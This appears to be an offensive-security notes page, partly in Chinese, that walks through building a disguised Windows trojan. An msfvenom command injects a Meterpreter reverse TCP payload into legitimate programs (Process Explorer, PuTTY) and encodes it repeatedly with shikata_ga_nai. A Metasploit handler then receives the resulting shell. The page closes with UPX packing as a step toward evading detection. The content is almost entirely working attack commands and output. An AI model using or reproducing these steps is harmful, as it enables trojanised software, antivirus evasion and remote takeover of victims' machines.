msfvenom -a x86 --platform Windows -x ProcessExplorer/procexp.exe -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -x putty.exe -k -b '\x00\x0a\xff' -i 10 -f exe -o payload2.exe Found 1 compatible encoders Attempting to encode payload with 10 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 381 (iteration=0) x86/shikata_ga_nai succeeded with size 408 (iteration=1) x86/shikata_ga_nai succeeded with size 435 (iteration=2) x86/shikata_ga_nai succeeded with size 462 (iteration=3) x86/shikata_ga_nai succeeded with size 489 (iteration=4) x86/shikata_ga_nai succeeded with size 516 (iteration=5) x86/shikata_ga_nai succeeded with size 543 (iteration=6) x86/shikata_ga_nai succeeded with size 570 (iteration=7) x86/shikata_ga_nai succeeded with size 597 (iteration=8) x86/shikata_ga_nai succeeded with size 624 (iteration=9) x86/shikata_ga_nai chosen with final size 624 Payload size: 624 bytes Final size of exe file: 702464 bytes Saved as: payload2.exe
将payload2.exe上传到windows下
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set lhost 192.168.0.150 lhost => 192.168.0.150 msf6 exploit(multi/handler) > set lport 4444 lport => 4444 msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.0.150:4444 [*] Sending stage (175686 bytes) to 192.168.0.158 [*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:50055) at 2022-06-28 17:23:50 +0800 meterpreter >
加壳
upx
#upx Ultimate Packer for eXecutables Copyright (C) 1996 - 2020 UPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020 Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file.. Commands: -1 compress faster -9 compress better -d decompress -l list compressed file -t test compressed file -V display version number -h give more help -L display software license Options: -q be quiet -v be verbose -oFILE write output to 'FILE' -f force compression of suspicious files -k keep backup files file.. executables to (de)compress Type 'upx --help' for more detailed help. UPX comes with ABSOLUTELY NO WARRANTY; for details visit https://upx.github.io
